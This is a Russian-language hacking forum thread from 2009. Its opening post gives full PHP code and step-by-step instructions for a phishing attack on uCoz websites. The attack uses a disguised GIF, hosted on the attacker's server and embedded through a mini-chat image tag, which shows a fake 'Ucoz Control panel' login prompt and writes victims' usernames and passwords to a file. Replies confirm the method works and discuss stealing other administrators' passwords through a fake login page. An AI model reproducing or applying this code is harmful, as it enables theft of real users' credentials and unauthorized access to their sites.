 |
|
15.02.2009, 17:32
|
|
Banned
Регистрация: 06.01.2008
Сообщений: 413
С нами:
9655526
Репутация:
1334
|
|
to NooB MC
Есть такой способ:
Нужно зарегистрировать хост с поддержкой php (например, http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например: passwords.txt (сюда будут присылаться пассы пользователей сайта), и на файл smile.gif. Далее качаем любой смайлик в расширении .gif (типа cool.gif). Потом в блокноте пишем:
Код:
<?
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>
После этого сохраняем файл под названием smile, потом меняем расширение на gif.
Теперь выбираем юкозовский сайт, например http://mysite.ucoz.ru/ потом в мини чате пишем логин, а в содержании сообщения:
[I*MG]http://mysite.phphost.net/smile.gif[/I*MG]
Если после этого в мини чате вместо сообщения появился смайлик - значит сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, будет появляться форма, в которую нужно будет ввести логин и пароль.
Ps: Но этот баг, наверное, уже прикрыли... |
|
|
16.02.2009, 21:16
|
|
Познающий
Регистрация: 16.02.2009
Сообщений: 44
С нами:
9069208
Репутация:
81
|
|
Сообщение от cash$$$
to NooB MC
Есть такой способ:
попробовал на своем сайте все работает
Последний раз редактировалось jokester; 17.02.2009 в 13:15..
Причина: Скопируй всю тему в /квот/
|
|
|
|
17.02.2009, 13:07
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 136
С нами:
9874363
Репутация:
653
|
|
Сообщение от cash$$$
to NooB MC
Есть такой способ:
Работа но не на всех сайтах
Последний раз редактировалось jokester; 17.02.2009 в 13:15..
Причина: Вы такие весёлые , ребята, я аж уписился
|
|
|
|
25.02.2009, 18:57
|
|
Новичок
Регистрация: 14.01.2009
Сообщений: 11
С нами:
9116707
Репутация:
3
|
|
Молодцы! Спс!
|
|
|
|
27.02.2009, 02:07
|
|
Новичок
Регистрация: 29.10.2008
Сообщений: 5
С нами:
9227507
Репутация:
0
|
|
а если я вошол в аккаунт админа , но не главного а второстепенного, я могу редактировать шаблоны но немогу зайти в админку.Какие скрипты применить чтобы найти пароли других админов и админки?
|
|
|
|
27.02.2009, 15:38
|
|
Познающий
Регистрация: 27.05.2008
Сообщений: 34
С нами:
9451330
Репутация:
19
|
|
Дефейс логина?
Чтобы отсылал на хост с php скриптом.
|
|
|
|
31.03.2009, 19:42
|
|
Новичок
Регистрация: 04.03.2008
Сообщений: 12
С нами:
9572517
Репутация:
37
|
|
Сообщение от BlackDraG
Дефейс логина?
Чтобы отсылал на хост с php скриптом.
ну или фейк авторизации, успех в том случае если включен img, старый способ но по сей день актуальный, хотя в админке укоза img по дефолту вроде отключен
|
|
|
|
07.04.2009, 23:43
|
|
Новичок
Регистрация: 20.03.2009
Сообщений: 2
С нами:
9023981
Репутация:
2
|
|
Смайл, кстати можно не только в миничат отправлять (в сообщении на форуме к примеру)  |
|
|
|
08.04.2009, 14:17
|
|
Постоянный
Регистрация: 25.08.2007
Сообщений: 365
С нами:
9848511
Репутация:
39
|
|
льем на фтп скрипт
А где сам скрипт
|
|
|
|
17.04.2009, 01:27
|
|
Banned
Регистрация: 05.04.2009
Сообщений: 105
С нами:
9000796
Репутация:
61
|
|
СПС! Всё дествительно работает!
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
